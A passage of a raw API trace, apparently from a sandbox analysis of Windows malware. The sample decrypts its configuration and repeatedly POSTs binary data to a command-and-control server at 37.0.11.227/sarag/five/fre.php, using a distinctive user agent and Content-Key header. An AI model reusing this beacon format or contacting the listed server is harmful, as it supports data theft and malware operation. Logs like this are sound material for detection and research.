(lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0194.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.081] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0194.081] GetProcessHeap () returned 0x690000 [0194.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0194.081] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ade50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0194.081] GetProcessHeap () returned 0x690000 [0194.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0194.081] socket (af=2, type=1, protocol=6) returned 0x3bc [0194.082] connect (s=0x3bc, name=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0194.112] FreeAddrInfoW (pAddrInfo=0x6ade50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0194.112] GetProcessHeap () returned 0x690000 [0194.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0194.112] GetProcessHeap () returned 0x690000 [0194.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0194.113] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.114] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0194.115] GetProcessHeap () returned 0x690000 [0194.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0194.115] GetProcessHeap () returned 0x690000 [0194.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0194.115] GetProcessHeap () returned 0x690000 [0194.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0194.116] GetProcessHeap () returned 0x690000 [0194.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0194.116] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.117] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0194.117] GetProcessHeap () returned 0x690000 [0194.117] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0194.117] GetProcessHeap () returned 0x690000 [0194.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0194.118] send (s=0x3bc, buf=0x6abd08*, len=242, flags=0) returned 242 [0194.119] send (s=0x3bc, buf=0x6aba40*, len=159, flags=0) returned 159 [0194.119] GetProcessHeap () returned 0x690000 [0194.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0194.119] recv (in: s=0x3bc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0194.202] GetProcessHeap () returned 0x690000 [0194.203] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0194.203] GetProcessHeap () returned 0x690000 [0194.203] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0194.205] GetProcessHeap () returned 0x690000 [0194.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0194.205] GetProcessHeap () returned 0x690000 [0194.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0194.205] closesocket (s=0x3bc) returned 0 [0194.206] GetProcessHeap () returned 0x690000 [0194.206] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0194.206] GetProcessHeap () returned 0x690000 [0194.206] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0194.207] GetProcessHeap () returned 0x690000 [0194.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0194.207] GetProcessHeap () returned 0x690000 [0194.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0194.207] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x900) returned 0x3bc [0194.211] Sleep (dwMilliseconds=0xea60) [0194.212] GetProcessHeap () returned 0x690000 [0194.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0194.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.214] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.224] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0194.231] GetProcessHeap () returned 0x690000 [0194.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0194.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.233] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0194.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.234] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.239] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.239] GetProcessHeap () returned 0x690000 [0194.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0194.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.243] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0194.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.244] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0194.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.245] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0194.245] GetProcessHeap () returned 0x690000 [0194.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0194.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.246] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0194.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.247] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0194.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.248] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0194.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.249] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0194.249] GetProcessHeap () returned 0x690000 [0194.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0194.249] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0194.249] GetProcessHeap () returned 0x690000 [0194.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0194.250] GetProcessHeap () returned 0x690000 [0194.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0194.250] GetProcessHeap () returned 0x690000 [0194.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0194.251] GetProcessHeap () returned 0x690000 [0194.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0194.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.252] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0194.266] GetProcessHeap () returned 0x690000 [0194.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0194.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.268] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0194.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.268] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.269] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.269] GetProcessHeap () returned 0x690000 [0194.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0194.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.271] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0194.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.272] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0194.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.272] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0194.272] GetProcessHeap () returned 0x690000 [0194.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0194.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.273] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0194.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.274] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0194.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.275] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0194.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.276] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0194.276] GetProcessHeap () returned 0x690000 [0194.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0194.276] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad7e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae958*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0194.276] GetProcessHeap () returned 0x690000 [0194.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0194.276] socket (af=2, type=1, protocol=6) returned 0x3c0 [0194.276] connect (s=0x3c0, name=0x6ae958*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0194.299] FreeAddrInfoW (pAddrInfo=0x6ad7e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae958*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0194.299] GetProcessHeap () returned 0x690000 [0194.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0194.299] GetProcessHeap () returned 0x690000 [0194.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0194.300] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.300] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0194.301] GetProcessHeap () returned 0x690000 [0194.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0194.301] GetProcessHeap () returned 0x690000 [0194.301] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0194.301] GetProcessHeap () returned 0x690000 [0194.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0194.301] GetProcessHeap () returned 0x690000 [0194.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0194.302] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.303] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0194.303] GetProcessHeap () returned 0x690000 [0194.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0194.303] GetProcessHeap () returned 0x690000 [0194.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0194.303] send (s=0x3c0, buf=0x6abd08*, len=242, flags=0) returned 242 [0194.304] send (s=0x3c0, buf=0x6aba40*, len=159, flags=0) returned 159 [0194.304] GetProcessHeap () returned 0x690000 [0194.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0194.304] recv (in: s=0x3c0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0194.376] GetProcessHeap () returned 0x690000 [0194.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0194.376] GetProcessHeap () returned 0x690000 [0194.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0194.376] GetProcessHeap () returned 0x690000 [0194.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0194.377] GetProcessHeap () returned 0x690000 [0194.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0194.377] closesocket (s=0x3c0) returned 0 [0194.378] GetProcessHeap () returned 0x690000 [0194.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0194.378] GetProcessHeap () returned 0x690000 [0194.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0194.378] GetProcessHeap () returned 0x690000 [0194.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0194.379] GetProcessHeap () returned 0x690000 [0194.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0194.379] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x868) returned 0x3c0 [0194.381] Sleep (dwMilliseconds=0xea60) [0194.383] GetProcessHeap () returned 0x690000 [0194.383] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0194.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.383] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0194.396] GetProcessHeap () returned 0x690000 [0194.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0194.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.397] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0194.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.398] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.399] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.399] GetProcessHeap () returned 0x690000 [0194.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0194.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.401] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0194.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.404] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0194.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.405] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0194.405] GetProcessHeap () returned 0x690000 [0194.405] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0194.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.409] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0194.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.410] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0194.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.412] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0194.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.425] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0194.425] GetProcessHeap () returned 0x690000 [0194.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0194.425] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0194.425] GetProcessHeap () returned 0x690000 [0194.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0194.426] GetProcessHeap () returned 0x690000 [0194.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0194.426] GetProcessHeap () returned 0x690000 [0194.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0194.427] GetProcessHeap () returned 0x690000 [0194.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0194.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.428] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0194.446] GetProcessHeap () returned 0x690000 [0194.446] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0194.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.447] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0194.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.448] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.449] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.449] GetProcessHeap () returned 0x690000 [0194.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0194.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.450] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0194.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.462] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0194.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.463] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0194.463] GetProcessHeap () returned 0x690000 [0194.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0194.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.464] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0194.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.465] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0194.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.466] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0194.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.467] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0194.467] GetProcessHeap () returned 0x690000 [0194.467] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0194.467] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9dc0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0194.467] GetProcessHeap () returned 0x690000 [0194.467] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0194.467] socket (af=2, type=1, protocol=6) returned 0x3c4 [0194.467] connect (s=0x3c4, name=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0194.495] FreeAddrInfoW 